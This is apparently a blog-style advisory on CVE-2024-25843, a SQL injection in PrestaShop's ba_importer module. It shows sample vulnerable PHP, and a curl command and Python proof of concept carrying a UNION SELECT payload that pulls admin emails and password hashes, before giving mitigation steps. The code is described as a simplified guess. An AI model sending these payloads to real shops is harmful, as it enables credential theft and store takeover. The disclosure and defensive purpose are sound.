PrestaShop is a popular e-commerce platform used worldwide. Add-ons enhance its abilities, but sometimes they also introduce security risks. This is the case for the "Import/Update Bulk Product from any Csv/Excel File Pro" module, also known as ba_importer. Through version 1.1.28, a critical SQL injection vulnerability (CVE-2024-25843) lets *unauthenticated attackers*—even guests—run malicious SQL directly against the store’s database. Let’s explore how this works, what risk it brings, and what you can do about it.
What is CVE-2024-25843?
- Module: Import/Update Bulk Product from any Csv/Excel File Pro (ba_importer)
Severity: Critical
- Access Required: None (guest/anonymous)
In simple words
If you run this PrestaShop add-on, attackers can send crafted requests and trick your shop into executing their own SQL commands—no login needed! This means they could steal data, delete information, or even create an administrator account and fully take over your shop.
How Does the SQL Injection Happen?
The affected versions did not sanitize or filter user input from requests to a script (usually a PHP endpoint) that processes CSV or Excel file data. Some of the parameters from the file or the request get inserted directly into a SQL query.
Here’s an example of what the vulnerable code might look like (simplified for clarity)
// File: controllers/front/upload.php (example)
$product_id = $_POST['product_id']; // input from unauthenticated user
$sql = "SELECT * FROM ps_product WHERE id_product = $product_id";
$result = Db::getInstance()->executeS($sql);
Problem: If someone sends product_id as 1 OR 1=1, the query becomes
SELECT * FROM ps_product WHERE id_product = 1 OR 1=1
This means all products are selected—clearly not intended! It gets even worse if someone sends malicious payloads.
A Simple Exploit
Suppose the vulnerable endpoint is at /modules/ba_importer/upload.php. An attacker could send a POST request like this:
curl -X POST https://yourshop.com/modules/ba_importer/upload.php \
-d 'product_id= UNION SELECT id,email,passwd FROM ps_employee -- '
This could dump your admin emails and password hashes!
The Impact: What Could Attackers Do?
- Steal personal data: Email addresses, orders, employee/admin info
Proof-of-Concept Exploit
Here’s a *basic* Python proof-of-concept using requests. Warning: Only test this on your own systems!
import requests
url = "https://yourshop.com/modules/ba_importer/upload.php"
payload = {
'product_id': ' UNION SELECT id,email,passwd FROM ps_employee -- '
}
r = requests.post(url, data=payload)
print(r.text) # This will print out admin IDs, emails, and password hashes if vulnerable!
Official References
- PrestaShop Addons - Import/Update Bulk Product Module
- NVD - CVE-2024-25843 Detail
- GitHub Issue & Public Advisory (if released)
1. Update Immediately
If you use ba_importer, upgrade to the latest version as soon as a patch is available. Visit the Buy Addons page for updates.
If you can’t update, disable the module by removing it from PrestaShop or deleting its directory
rm -rf modules/ba_importer
3. Block Unnecessary Endpoints
Use a web application firewall (WAF) to block access to vulnerable PHP files for non-admins.
4. Monitor Your Logs
Check for strange requests to /modules/ba_importer/upload.php or similar endpoints.
Final Thoughts
SQL injection is one of the most dangerous web vulnerabilities. In this case, just having this module enabled puts your whole store at risk. Take this seriously—update or remove ba_importer now!
Timeline
Published on: 02/27/2024 17:15:12 UTC
Last modified on: 08/29/2024 20:36:21 UTC